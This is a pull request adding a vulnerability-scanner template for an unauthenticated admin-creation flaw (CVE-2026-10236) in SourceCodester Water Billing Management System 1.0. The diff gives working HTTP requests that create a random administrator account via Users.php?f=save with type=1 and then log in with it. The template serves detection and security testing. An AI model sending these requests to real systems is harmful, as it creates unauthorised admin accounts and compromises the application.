### PR TITLE
feat: add CVE-2026-10236 SourceCodester Water Billing unauth admin creation

### DIFF
--- a/http/cves/2026/CVE-2026-10236.yaml
+++ b/http/cves/2026/CVE-2026-10236.yaml
@@ -1,0 +1,72 @@
+id: CVE-2026-10236
+
+info:
+  name: SourceCodester Water Billing Management System 1.0 - Unauthenticated Admin Creation
+  author: l46983284-cpu
+  severity: high
+  description: |
+    SourceCodester Water Billing Management System 1.0 contains an improper authorization vulnerability in /classes/Users.php?f=save.
+    The endpoint does not require an authenticated admin session, so unauthenticated attackers can create administrative accounts by posting type=1.
+  impact: |
+    Unauthenticated attackers can create administrator accounts and fully compromise the application.
+  remediation: |
+    Enforce authenticated administrative session checks before creating or modifying users via Users.php.
+  reference:
+    - https://github.com/renzortega1337/Security-Research-/blob/main/CVE-2026-10236.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-10236
+    - https://vuldb.com/?id.367515
+    - https://www.sourcecodester.com/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 7.3
+    cve-id: CVE-2026-10236
+    cwe-id: CWE-306
+    epss-score: 0.00045
+    epss-percentile: 0.12000
+    cpe: cpe:2.3:a:sourcecodester:water_billing_management_system:1.0:*:*:*:*:*:*:*
+  metadata:
+    verified: false
+    max-request: 4
+    vendor: sourcecodester
+    product: water_billing_management_system
+    fofa-query: body="Water Billing Management System"
+  tags: cve,cve2026,sourcecodester,unauth,intrusive,auth-bypass,vuln
+
+variables:
+  username: "{{rand_base(10)}}"
+  password: "{{rand_base(12)}}"
+  firstname: "{{rand_base(8)}}"
+  lastname: "{{rand_base(8)}}"
+
+http:
+  - raw:
+      - |
+        POST {{path}}classes/Users.php?f=save HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Requested-With: XMLHttpRequest
+
+        id=&firstname={{firstname}}&lastname={{lastname}}&username={{username}}&password={{password}}&type=1
+
+      - |
+        POST {{path}}classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Requested-With: XMLHttpRequest
+
+        username={{username}}&password={{password}}
+
+    payloads:
+      path:
+        - /
+        - /wbms/
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200 && status_code_2 == 200'
+          - 'contains_any(body_2, "\"status\":\"success\"", "\"status\": \"success\"", "success") || trim(body_2) == "1"'
+          - '!contains(to_lower(body_2), "incorrect")'
+          - '!contains(to_lower(body_2), "invalid")'
+        condition: and


### PR DESCRIPTION
### PR Information

- Added CVE-2026-10236
- References:
  - https://github.com/renzortega1337/Security-Research-/blob/main/CVE-2026-10236.md
  - https://nvd.nist.gov/vuln/detail/CVE-2026-10236
  - https://vuldb.com/?id.367515

Unauthenticated admin creation via POST /classes/Users.php?f=save (and /wbms/ prefix) with type=1, confirmed by subsequent login as the created user.

### Template validation

- [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Template crafted from public advisory request/response details. Marked verified:false / intrusive because it creates a random admin user then attempts login.